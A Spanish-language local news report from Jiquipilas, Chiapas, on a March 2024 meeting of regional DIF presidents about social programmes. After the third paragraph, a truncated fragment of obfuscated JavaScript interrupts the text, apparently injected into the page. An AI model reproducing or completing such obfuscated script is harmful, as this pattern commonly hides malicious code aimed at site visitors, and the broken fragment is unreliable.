Madely Montejo presenta estrategias para el cumplimiento de los programas sociales del SDIFM 2024

Redacción.

13 de marzo del 2024. Jiquipilas, Chiapas. – Tras efectuarse en Cintalapa la primera reunión de presidentas del DIF de la región II Valles Zoque, la primera dama de Jiquipilas Madely Montejo Maza, refrendó su compromiso para continuar trabajando por el bienestar de las familias, las mujeres, los niños y los adultos mayores.

Dijo que a través de los diversos programas y proyectos estatales han podido atender a cientos de familias jiquipiltecas, por lo que para este 2024 ya existe un plan de actividades para brindar mejor calidad de vida a estos sectores vulnerables.

Durante la reunión, cada representante de área expuso mediante gráficas los avances y retos que se afrontarán, con la finalidad de dar cumplimiento a los programas sociales. Importante mencionar, que estuvieron presentes las presidentas del DIF de Cintalapa y Ocozocoautla, además de la Delegada de la Región Valle Zoque.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About

Check Also

CAMIONETA MAZDA IMPACTA CAMELLÓN Y QUEDA SOBRE LA DIVISIÓN VIAL #Tuxtla

TUXTLA GUTIÉRREZ, CHIAPAS16 de septiembre de 2026 Una camioneta Mazda CX-30, modelo 2026, terminó sobre …